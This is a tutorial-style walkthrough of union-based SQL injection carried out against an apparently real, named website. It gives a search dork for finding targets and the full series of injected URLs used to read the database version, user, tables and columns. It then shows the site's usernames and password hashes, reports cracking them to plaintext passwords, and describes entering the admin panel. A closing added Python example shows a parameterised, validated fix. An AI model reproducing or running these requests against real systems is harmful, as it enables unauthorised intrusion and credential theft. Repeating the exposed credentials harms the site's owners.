Principles of SQL Injection
After a successful SQL injection, you may obtain all the information in the target database!
First, find the target URL to test the vulnerability.
Search in Google: inurl:news.php?id=2
Open any of the resulting URLs and append an SQL statement to it. If an error is reported, the parameter can be injected. If no error is reported, either there is no injection vulnerability or it has not been found.
For example, find a URL: http://www.calidus.ro/en/news.php?id=2
Change the link to the following:
http://www.calidus.ro/en/news.php?id=2 UNION SELECT 1--
http://www.calidus.ro/en/news.php?id=2 UNION SELECT 1,2--
http://www.calidus.ro/en/news.php?id=2 UNION SELECT 1,2,3--
http://www.calidus.ro/en/news.php?id=2 UNION SELECT 1,2,3,4--
The first three will prompt the following information:
Query failed: The used SELECT statements have a different number of columns
Because both sides of a UNION query must have the same number of columns, we can see that the normal query returns four columns.
The fourth request displays, in addition to the normal article:
24
Note that columns 1 and 3 are queried but not displayed, so we can use fields 2 and 4.
http://www.calidus.ro/en/news.php?id=2%20UNION%20SELECT%201,version(),3,database()--
5.1.70-logcaliduzb_calidussql
The above shows the database version and current database name.
Next, find the database user name.
http://www.calidus.ro/en/news.php?id=2%20UNION%20SELECT%201,version(),3,user()--
5.1.70-logcaliduzb_calidus@localhost
The password() function is not supported in this version, so the password cannot be found for the moment.
The following SQL queries all the tables in the current database.
http://www.calidus.ro/en/news.php?id=2 union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()--
2
about,about_de,about_en,categories,categories_de,categories_en,contact,contact_de,contact_en,customers,eco,eco_de,eco_en,faq,faq_de,faq_en,forum_answer,forum_question,galleries,gallery,gallery_de,gallery_en,gallery_images,imp,mission,mission_de,mission_en,news,news_de,news_en,pellets,pellets_de,pellets_en,prices,products,products_de,products_en,projects,projects_de,projects_en,special_offers,special_offers_de,special_offers_en,support,support_de,support_en,users,vizion,vizion_de,vizion_en
There is a users table; first look at its fields:
http://www.calidus.ro/en/news.php?id=2 union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='users'--
user_id,user_type,user_regdate,username,user_password,user_email,user_lastvisit,user_last_confirm_key,user_new_privmsg,logcode,username_clean
Username and password fields are available.
Check the user name and password.
http://www.calidus.ro/en/news.php?id=2 union select 1,username,3,user_password from users--
dexmoda0dbde9503e13437db0f854b0b72a73badmin63a9f0ea7bb98050796b649e85481845miladro122f961db675f6a45b998594471a990b
The username is in plaintext and the password has been hashed. A decryption website found the passwords to be marjan and root.
Go to the website management page to manage the website. (An email has been sent to the website to inform it of the SQL injection vulnerability.)
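The behaviour shown above is what results when a page concatenates the id parameter into its SQL text. The following added example (not code from the original page or from the site) puts that pattern beside a hardened version; it assumes Python with an in-memory SQLite database standing in for PHP/MySQL, and the table layout, sample rows and function names are constructed for illustration.

```python
import sqlite3

PAGE_PAYLOAD = "2 UNION SELECT 1,2,3,4--"  # the id value used in the walkthrough above

def make_db():
    # Constructed sample data: a four-column news table, as the page infers.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER, title TEXT, day TEXT, body TEXT)")
    db.executemany("INSERT INTO news VALUES (?, ?, ?, ?)",
                   [(1, "First", "2014-01-01", "a"), (2, "Second", "2014-01-02", "b")])
    return db

def news_vulnerable(db, raw_id):
    # Root cause: the request parameter is concatenated into the SQL text,
    # so everything after the number is parsed as SQL.
    return db.execute(
        "SELECT id, title, day, body FROM news WHERE id = " + raw_id).fetchall()

def news_hardened(db, raw_id):
    # 1) Validate: the id must be a plain ASCII decimal integer.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("invalid id")
    # 2) Bind: the value travels separately from the SQL text.
    return db.execute(
        "SELECT id, title, day, body FROM news WHERE id = ?", (int(raw_id),)).fetchall()

def handle_request(db, raw_id):
    # 3) Never echo database errors to the client; the "Query failed: ..."
    #    text is what revealed the column count in the walkthrough.
    try:
        return 200, news_hardened(db, raw_id)
    except ValueError:
        return 400, []
    except sqlite3.Error:
        return 500, []

if __name__ == "__main__":
    db = make_db()
    print(news_vulnerable(db, PAGE_PAYLOAD))  # injected row appears next to the article
    print(handle_request(db, PAGE_PAYLOAD))   # rejected before reaching the database
    print(handle_request(db, "2"))            # normal request still works
```

The same three measures apply in PHP: cast or validate the id, use prepared statements (PDO or mysqli), and log query errors on the server instead of printing them in the page.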